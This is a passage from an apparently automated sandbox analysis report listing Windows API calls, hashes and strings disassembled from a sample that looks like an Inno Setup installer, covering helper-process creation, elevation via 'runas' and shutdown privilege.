                                                                            • Instruction ID: d892f33e09ba9bc7304af59ed1bd982b4427bde6cd355302a364b0e8927efaaf
                                                                            • Opcode Fuzzy Hash: 2f3da4ea7652235e9563b7b11f328aef08bde54833d269609cfe7e93d4b3e5df
                                                                            • Instruction Fuzzy Hash: 2DC04CA9300101879F00BAAE95D190663D85E583057504066B944CF207D668D8144A18
                                                                            APIs
                                                                            • SetCurrentDirectoryA.KERNEL32(00000000,?,0049778A,00000000,0049795D,?,?,00000005,00000000,00497991,?,?,00000000), ref: 004072BB
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.2560521000.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000003.00000002.2560363826.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000003.00000002.2560668844.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000003.00000002.2560813579.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000003.00000002.2560921822.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000003.00000002.2561047481.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_400000_ZFllSoXpoT.jbxd
                                                                            Similarity
                                                                            • API ID: CurrentDirectory
                                                                            • String ID:
                                                                            • API String ID: 1611563598-0
                                                                            • Opcode ID: b7f7ac57d488892482cd1d27060886e150623f3d0701accf4d1aa85b87094221
                                                                            • Instruction ID: c18bf430a4858a09d5fd0626d157798880aaaa8ea81a5298b6cf69089c3012d4
                                                                            • Opcode Fuzzy Hash: b7f7ac57d488892482cd1d27060886e150623f3d0701accf4d1aa85b87094221
                                                                            • Instruction Fuzzy Hash: B0B012E03D161B27CA0079FE4CC191A01CC46292163501B3A3006E71C3D83CC8080514
                                                                            APIs
                                                                            • SetErrorMode.KERNEL32(?,0042E41D), ref: 0042E410
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.2560521000.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000003.00000002.2560363826.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000003.00000002.2560668844.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000003.00000002.2560813579.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000003.00000002.2560921822.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000003.00000002.2561047481.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_400000_ZFllSoXpoT.jbxd
                                                                            Similarity
                                                                            • API ID: ErrorMode
                                                                            • String ID:
                                                                            • API String ID: 2340568224-0
                                                                            • Opcode ID: 874db3389c4172aa30432ca027f259e533f636a378579170be3356e0d0ef28c9
                                                                            • Instruction ID: 55140b1eedf56d48a55774d01a07de49d55d18186a895614534630d02c3c9fff
                                                                            • Opcode Fuzzy Hash: 874db3389c4172aa30432ca027f259e533f636a378579170be3356e0d0ef28c9
                                                                            • Instruction Fuzzy Hash: D4B09B7671C6105DFB05D695745152D63D4D7C57203E14577F010D7580D53D58004D18
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.2560521000.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000003.00000002.2560363826.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000003.00000002.2560668844.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000003.00000002.2560813579.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000003.00000002.2560921822.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000003.00000002.2561047481.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_400000_ZFllSoXpoT.jbxd
                                                                            Similarity
                                                                            • API ID: 74285
                                                                            • String ID:
                                                                            • API String ID: 3433674075-0
                                                                            • Opcode ID: e610db4be5d09209adc61dd78440b7b0e9dd7066f593708e54d36c975471eb1e
                                                                            • Instruction ID: 444a78761fbc6a727879d8c4239369b0bde5fc0390465f01f64749401816922a
                                                                            • Opcode Fuzzy Hash: e610db4be5d09209adc61dd78440b7b0e9dd7066f593708e54d36c975471eb1e
                                                                            • Instruction Fuzzy Hash: CDA002756015049ADE04A7A5C849F662298BB44204FC915F971449B092C53C99008E58
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.2560521000.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000003.00000002.2560363826.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000003.00000002.2560668844.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000003.00000002.2560813579.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000003.00000002.2560921822.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000003.00000002.2561047481.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_400000_ZFllSoXpoT.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: f5c68f552ed74045d4ecaf4ea1ad1c13e781980e3dd0252519992c1da40edc52
                                                                            • Instruction ID: 3a42617683b163d9d3e29dc322e321d1f787465d7b697eb1a78dfeb7447b1e7e
                                                                            • Opcode Fuzzy Hash: f5c68f552ed74045d4ecaf4ea1ad1c13e781980e3dd0252519992c1da40edc52
                                                                            • Instruction Fuzzy Hash: CB518574E042099FEB01EFA9C892AAEBBF5EF49314F50417AE500E7351DB389D45CB98
                                                                            APIs
                                                                            • MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00000000,0047DC20,?,?,?,?,00000000,00000000,00000000,00000000), ref: 0047DBDA
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.2560521000.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000003.00000002.2560363826.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000003.00000002.2560668844.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000003.00000002.2560813579.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000003.00000002.2560921822.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000003.00000002.2561047481.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_400000_ZFllSoXpoT.jbxd
                                                                            Similarity
                                                                            • API ID: ByteCharMultiWide
                                                                            • String ID:
                                                                            • API String ID: 626452242-0
                                                                            • Opcode ID: 6347e2abfdb9d8760a4239e6b67e4a018abca6dee8a8eb8bc94886bd32a16ad8
                                                                            • Instruction ID: a4a2cf2857c8d8ea8b604d5a3bb359359cf50968c17c86877c7e7666634e0114
                                                                            • Opcode Fuzzy Hash: 6347e2abfdb9d8760a4239e6b67e4a018abca6dee8a8eb8bc94886bd32a16ad8
                                                                            • Instruction Fuzzy Hash: 79519C30A04248AFDB20DF65D8C5BAABBB8EB18304F118077E804A73A1D778AD45CB59
                                                                            APIs
                                                                            • VirtualAlloc.KERNEL32(00000000,00001000,00001000,00000040,?,00000000,0041EDB4,?,0042389F,00423C1C,0041EDB4), ref: 0041F3F2
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.2560521000.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000003.00000002.2560363826.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000003.00000002.2560668844.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000003.00000002.2560813579.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000003.00000002.2560921822.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000003.00000002.2561047481.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_400000_ZFllSoXpoT.jbxd
                                                                            Similarity
                                                                            • API ID: AllocVirtual
                                                                            • String ID:
                                                                            • API String ID: 4275171209-0
                                                                            • Opcode ID: 6d92aa0cb1a2d53983b86e461a62a4ce5a5a47657027c2647c88d78d486bc28e
                                                                            • Instruction ID: 6bd7adec2090487eae29abc1928bf57af59456791c97a49d6ef8c5917aacc84c
                                                                            • Opcode Fuzzy Hash: 6d92aa0cb1a2d53983b86e461a62a4ce5a5a47657027c2647c88d78d486bc28e
                                                                            • Instruction Fuzzy Hash: 0E1148742007069BC710DF19D880B86FBE5EB98390B10C53BE9588B385D374E8558BA9
                                                                            APIs
                                                                            • GetLastError.KERNEL32(00000000,00453019), ref: 00452FFB
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.2560521000.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000003.00000002.2560363826.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000003.00000002.2560668844.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000003.00000002.2560813579.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000003.00000002.2560921822.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000003.00000002.2561047481.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_400000_ZFllSoXpoT.jbxd
                                                                            Similarity
                                                                            • API ID: ErrorLast
                                                                            • String ID:
                                                                            • API String ID: 1452528299-0
                                                                            • Opcode ID: 0834ab1e0ff74d13c83467379b9d37ae80668f7e4bd4fe23633cfebca466aa95
                                                                            • Instruction ID: 3702fe8876d82bde104835ae14f19b545f9b4323f369928b31ff8c7c86e788f0
                                                                            • Opcode Fuzzy Hash: 0834ab1e0ff74d13c83467379b9d37ae80668f7e4bd4fe23633cfebca466aa95
                                                                            • Instruction Fuzzy Hash: 32014C356043086A8B10CF69AC004AEFBE8DB4D7217108277FC14D3382DA744E0496E4
                                                                            APIs
                                                                            • VirtualFree.KERNEL32(?,?,00004000,?,?,?,?,?,00401973), ref: 00401766
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.2560521000.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000003.00000002.2560363826.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000003.00000002.2560668844.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000003.00000002.2560813579.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000003.00000002.2560921822.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000003.00000002.2561047481.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_400000_ZFllSoXpoT.jbxd
                                                                            Similarity
                                                                            • API ID: FreeVirtual
                                                                            • String ID:
                                                                            • API String ID: 1263568516-0
                                                                            • Opcode ID: 3cb279d385dc81f8188aef87182d0a586e7f532f71175ddb5b892d42a5daf7f8
                                                                            • Instruction ID: fd45504e6079eb3c344fd15592bdf3984e08e9418c18d248e8b2091ea2ac4f2a
                                                                            • Opcode Fuzzy Hash: 3cb279d385dc81f8188aef87182d0a586e7f532f71175ddb5b892d42a5daf7f8
                                                                            • Instruction Fuzzy Hash: A10120766443148FC3109F29EDC0E2677E8D794378F15453EDA85673A1D37A6C0187D8
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.2560521000.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000003.00000002.2560363826.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000003.00000002.2560668844.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000003.00000002.2560813579.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000003.00000002.2560921822.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000003.00000002.2561047481.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_400000_ZFllSoXpoT.jbxd
                                                                            Similarity
                                                                            • API ID: CloseHandle
                                                                            • String ID:
                                                                            • API String ID: 2962429428-0
                                                                            • Opcode ID: b938081ec37ef3dcaeb0613a6c9f19dce7446eae7aee343fbba8aa446800b67d
                                                                            • Instruction ID: 073c3129693101c5e7833b7ffa09eca8aa7a1e81ff9bb2ce6bcaaab03392c7d4
                                                                            • Opcode Fuzzy Hash: b938081ec37ef3dcaeb0613a6c9f19dce7446eae7aee343fbba8aa446800b67d
                                                                            • Instruction Fuzzy Hash:
                                                                            APIs
                                                                            • GetVersion.KERNEL32(?,00419000,00000000,?,?,?,00000001), ref: 0041F136
                                                                            • SetErrorMode.KERNEL32(00008000,?,00419000,00000000,?,?,?,00000001), ref: 0041F152
                                                                            • LoadLibraryA.KERNEL32(CTL3D32.DLL,00008000,?,00419000,00000000,?,?,?,00000001), ref: 0041F15E
                                                                            • SetErrorMode.KERNEL32(00000000,CTL3D32.DLL,00008000,?,00419000,00000000,?,?,?,00000001), ref: 0041F16C
                                                                            • GetProcAddress.KERNEL32(00000001,Ctl3dRegister), ref: 0041F19C
                                                                            • GetProcAddress.KERNEL32(00000001,Ctl3dUnregister), ref: 0041F1C5
                                                                            • GetProcAddress.KERNEL32(00000001,Ctl3dSubclassCtl), ref: 0041F1DA
                                                                            • GetProcAddress.KERNEL32(00000001,Ctl3dSubclassDlgEx), ref: 0041F1EF
                                                                            • GetProcAddress.KERNEL32(00000001,Ctl3dDlgFramePaint), ref: 0041F204
                                                                            • GetProcAddress.KERNEL32(00000001,Ctl3dCtlColorEx), ref: 0041F219
                                                                            • GetProcAddress.KERNEL32(00000001,Ctl3dAutoSubclass), ref: 0041F22E
                                                                            • GetProcAddress.KERNEL32(00000001,Ctl3dUnAutoSubclass), ref: 0041F243
                                                                            • GetProcAddress.KERNEL32(00000001,Ctl3DColorChange), ref: 0041F258
                                                                            • GetProcAddress.KERNEL32(00000001,BtnWndProc3d), ref: 0041F26D
                                                                            • FreeLibrary.KERNEL32(00000001,?,00419000,00000000,?,?,?,00000001), ref: 0041F27F
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.2560521000.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000003.00000002.2560363826.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000003.00000002.2560668844.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000003.00000002.2560813579.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000003.00000002.2560921822.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000003.00000002.2561047481.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_400000_ZFllSoXpoT.jbxd
                                                                            Similarity
                                                                            • API ID: AddressProc$ErrorLibraryMode$FreeLoadVersion
                                                                            • String ID: BtnWndProc3d$CTL3D32.DLL$Ctl3DColorChange$Ctl3dAutoSubclass$Ctl3dCtlColorEx$Ctl3dDlgFramePaint$Ctl3dRegister$Ctl3dSubclassCtl$Ctl3dSubclassDlgEx$Ctl3dUnAutoSubclass$Ctl3dUnregister
                                                                            • API String ID: 2323315520-3614243559
                                                                            • Opcode ID: 7561659b3b600d63638f3944902fd7923d8484a487a3f9680a3db5d0744bedbe
                                                                            • Instruction ID: d5058fc073e0ad59750b6b6eed82d26134d8568d962b0a84cfd108907e917b52
                                                                            • Opcode Fuzzy Hash: 7561659b3b600d63638f3944902fd7923d8484a487a3f9680a3db5d0744bedbe
                                                                            • Instruction Fuzzy Hash: 8D310DB2640700EBEB01EBB9AC86A663294F728724745093FB508DB192D77C5C49CB1C
                                                                            APIs
                                                                            • GetTickCount.KERNEL32 ref: 00458993
                                                                            • QueryPerformanceCounter.KERNEL32(02133858,00000000,00458C26,?,?,02133858,00000000,?,00459322,?,02133858,00000000), ref: 0045899C
                                                                            • GetSystemTimeAsFileTime.KERNEL32(02133858,02133858), ref: 004589A6
                                                                            • GetCurrentProcessId.KERNEL32(?,02133858,00000000,00458C26,?,?,02133858,00000000,?,00459322,?,02133858,00000000), ref: 004589AF
                                                                            • CreateNamedPipeA.KERNEL32(00000000,40080003,00000006,00000001,00002000,00002000,00000000,00000000), ref: 00458A25
                                                                            • GetLastError.KERNEL32(00000000,40080003,00000006,00000001,00002000,00002000,00000000,00000000,?,02133858,02133858), ref: 00458A33
                                                                            • CreateFileA.KERNEL32(00000000,C0000000,00000000,00499B24,00000003,00000000,00000000,00000000,00458BE2), ref: 00458A7B
                                                                            • SetNamedPipeHandleState.KERNEL32(000000FF,00000002,00000000,00000000,00000000,00458BD1,?,00000000,C0000000,00000000,00499B24,00000003,00000000,00000000,00000000,00458BE2), ref: 00458AB4
                                                                              • Part of subcall function 0042D8D4: GetSystemDirectoryA.KERNEL32(?,00000104), ref: 0042D8E7
                                                                            • CreateProcessA.KERNEL32(00000000,00000000,?,00000000,00000000,00000001,0C000000,00000000,00000000,00000044,?,000000FF,00000002,00000000,00000000,00000000), ref: 00458B5D
                                                                            • CloseHandle.KERNEL32(?,00000000,00000000,?,00000000,00000000,00000001,0C000000,00000000,00000000,00000044,?,000000FF,00000002,00000000,00000000), ref: 00458B93
                                                                            • CloseHandle.KERNEL32(000000FF,00458BD8,?,00000000,00000000,00000001,0C000000,00000000,00000000,00000044,?,000000FF,00000002,00000000,00000000,00000000), ref: 00458BCB
                                                                              • Part of subcall function 00453488: GetLastError.KERNEL32(00000000,0045401D,00000005,00000000,00454052,?,?,00000000,0049B628,00000004,00000000,00000000,00000000,?,00497D75,00000000), ref: 0045348B
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.2560521000.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000003.00000002.2560363826.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000003.00000002.2560668844.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000003.00000002.2560813579.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000003.00000002.2560921822.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000003.00000002.2561047481.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_400000_ZFllSoXpoT.jbxd
                                                                            Similarity
                                                                            • API ID: CreateHandle$CloseErrorFileLastNamedPipeProcessSystemTime$CountCounterCurrentDirectoryPerformanceQueryStateTick
                                                                            • String ID: 64-bit helper EXE wasn't extracted$Cannot utilize 64-bit features on this version of Windows$CreateFile$CreateNamedPipe$CreateProcess$D$Helper process PID: %u$SetNamedPipeHandleState$Starting 64-bit helper process.$\\.\pipe\InnoSetup64BitHelper-%.8x-%.8x-%.8x-%.8x%.8x$helper %d 0x%x$i
                                                                            • API String ID: 770386003-3271284199
                                                                            • Opcode ID: b3cb95de96f0a494fe77a0225261b47a74f516519aada3d90b4a318c7d3773ef
                                                                            • Instruction ID: 46381a2ef6f5f7687f8d932114089cfc0a3b3023078b53c1614b04e084b280c9
                                                                            • Opcode Fuzzy Hash: b3cb95de96f0a494fe77a0225261b47a74f516519aada3d90b4a318c7d3773ef
                                                                            • Instruction Fuzzy Hash: 02711370A04348AEDB11DB69CC41B5EBBF8EB15705F1084BAB944FB282DB7859488B69
                                                                            APIs
                                                                              • Part of subcall function 0047828C: GetModuleHandleA.KERNEL32(kernel32.dll,GetFinalPathNameByHandleA,02132BE0,?,?,?,02132BE0,00478450,00000000,0047856E,?,?,-00000010,?), ref: 004782A5
                                                                              • Part of subcall function 0047828C: GetProcAddress.KERNEL32(00000000,kernel32.dll), ref: 004782AB
                                                                              • Part of subcall function 0047828C: GetFileAttributesA.KERNEL32(00000000,00000000,kernel32.dll,GetFinalPathNameByHandleA,02132BE0,?,?,?,02132BE0,00478450,00000000,0047856E,?,?,-00000010,?), ref: 004782BE
                                                                              • Part of subcall function 0047828C: CreateFileA.KERNEL32(00000000,00000000,00000007,00000000,00000003,00000000,00000000,00000000,00000000,kernel32.dll,GetFinalPathNameByHandleA,02132BE0,?,?,?,02132BE0), ref: 004782E8
                                                                              • Part of subcall function 0047828C: CloseHandle.KERNEL32(00000000,?,?,?,02132BE0,00478450,00000000,0047856E,?,?,-00000010,?), ref: 00478306
                                                                              • Part of subcall function 00478364: GetCurrentDirectoryA.KERNEL32(00000104,?,00000000,004783F6,?,?,?,02132BE0,?,00478458,00000000,0047856E,?,?,-00000010,?), ref: 00478394
                                                                            • ShellExecuteEx.SHELL32(0000003C), ref: 004784A8
                                                                            • GetLastError.KERNEL32(00000000,0047856E,?,?,-00000010,?), ref: 004784B1
                                                                            • MsgWaitForMultipleObjects.USER32(00000001,00000000,00000000,000000FF,000000FF), ref: 004784FE
                                                                            • GetExitCodeProcess.KERNEL32(00000000,00000000), ref: 00478522
                                                                            • CloseHandle.KERNEL32(00000000,00478553,00000000,00000000,000000FF,000000FF,00000000,0047854C,?,00000000,0047856E,?,?,-00000010,?), ref: 00478546
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.2560521000.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000003.00000002.2560363826.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000003.00000002.2560668844.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000003.00000002.2560813579.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000003.00000002.2560921822.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000003.00000002.2561047481.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_400000_ZFllSoXpoT.jbxd
                                                                            Similarity
                                                                            • API ID: Handle$CloseFile$AddressAttributesCodeCreateCurrentDirectoryErrorExecuteExitLastModuleMultipleObjectsProcProcessShellWait
                                                                            • String ID: <$GetExitCodeProcess$MsgWaitForMultipleObjects$ShellExecuteEx$ShellExecuteEx returned hProcess=0$runas
                                                                            • API String ID: 883996979-221126205
                                                                            • Opcode ID: 7bc79704bed3dd733a1086ace77ac7314c1c869dae30f57a13a5b111f7ab0a8e
                                                                            • Instruction ID: be90243bdd9c3757315ff9bbcfcad83cd6a8df60a98d136a70e83fac94f3d3e4
                                                                            • Opcode Fuzzy Hash: 7bc79704bed3dd733a1086ace77ac7314c1c869dae30f57a13a5b111f7ab0a8e
                                                                            • Instruction Fuzzy Hash: E0314670A40609BEDB11EFAAD845ADEB6B8EF05314F50847FF518E7281DB7C89058B19
                                                                            APIs
                                                                            • SendMessageA.USER32(00000000,00000223,00000000,00000000), ref: 00422A04
                                                                            • ShowWindow.USER32(00000000,00000003,00000000,00000223,00000000,00000000,00000000,00422BCE), ref: 00422A14
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.2560521000.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000003.00000002.2560363826.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000003.00000002.2560668844.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000003.00000002.2560813579.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000003.00000002.2560921822.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000003.00000002.2561047481.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_400000_ZFllSoXpoT.jbxd
                                                                            Similarity
                                                                            • API ID: MessageSendShowWindow
                                                                            • String ID:
                                                                            • API String ID: 1631623395-0
                                                                            • Opcode ID: ba2239a6b7e39db5a6c256e0bd052b844ec1d952261cb85ab3a20d26880a6eee
                                                                            • Instruction ID: ac1ceeab966790095f9612ce7a7db5e594191b89627cdcc61fab65d1acc55ab9
                                                                            • Opcode Fuzzy Hash: ba2239a6b7e39db5a6c256e0bd052b844ec1d952261cb85ab3a20d26880a6eee
                                                                            • Instruction Fuzzy Hash: 79914071B04214BFD711EFA9DA86F9D77F4AB04314F5500BAF504AB3A2CB78AE409B58
                                                                            APIs
                                                                            • IsIconic.USER32(?), ref: 004183A3
                                                                            • GetWindowPlacement.USER32(?,0000002C), ref: 004183C0
                                                                            • GetWindowRect.USER32(?), ref: 004183DC
                                                                            • GetWindowLongA.USER32(?,000000F0), ref: 004183EA
                                                                            • GetWindowLongA.USER32(?,000000F8), ref: 004183FF
                                                                            • ScreenToClient.USER32(00000000), ref: 00418408
                                                                            • ScreenToClient.USER32(00000000,?), ref: 00418413
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.2560521000.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000003.00000002.2560363826.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000003.00000002.2560668844.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000003.00000002.2560813579.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000003.00000002.2560921822.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000003.00000002.2561047481.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_400000_ZFllSoXpoT.jbxd
                                                                            Similarity
                                                                            • API ID: Window$ClientLongScreen$IconicPlacementRect
                                                                            • String ID: ,
                                                                            • API String ID: 2266315723-3772416878
                                                                            • Opcode ID: 6217f91ca86bc21168c1a31dc77beadf87db026dacfe8a4e2043101b83599555
                                                                            • Instruction ID: f1655e9c1aaa1f9d3e17845697c0dfec8ab0781743990dff6cd0a114faef5a7c
                                                                            • Opcode Fuzzy Hash: 6217f91ca86bc21168c1a31dc77beadf87db026dacfe8a4e2043101b83599555
                                                                            • Instruction Fuzzy Hash: D6112B71505201AFDB00EF69C885F9B77E8AF49314F18067EBD58DB286D738D900CBA9
                                                                            APIs
                                                                            • GetCurrentProcess.KERNEL32(00000028), ref: 004555DF
                                                                            • OpenProcessToken.ADVAPI32(00000000,00000028), ref: 004555E5
                                                                            • LookupPrivilegeValueA.ADVAPI32(00000000,SeShutdownPrivilege,00000028), ref: 004555FE
                                                                            • AdjustTokenPrivileges.ADVAPI32(?,00000000,00000002,00000000,00000000,00000000), ref: 00455625
                                                                            • GetLastError.KERNEL32(?,00000000,00000002,00000000,00000000,00000000), ref: 0045562A
                                                                            • ExitWindowsEx.USER32(00000002,00000000), ref: 0045563B
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.2560521000.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000003.00000002.2560363826.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000003.00000002.2560668844.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000003.00000002.2560813579.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000003.00000002.2560921822.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000003.00000002.2561047481.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_3_2_400000_ZFllSoXpoT.jbxd
                                                                            Similarity
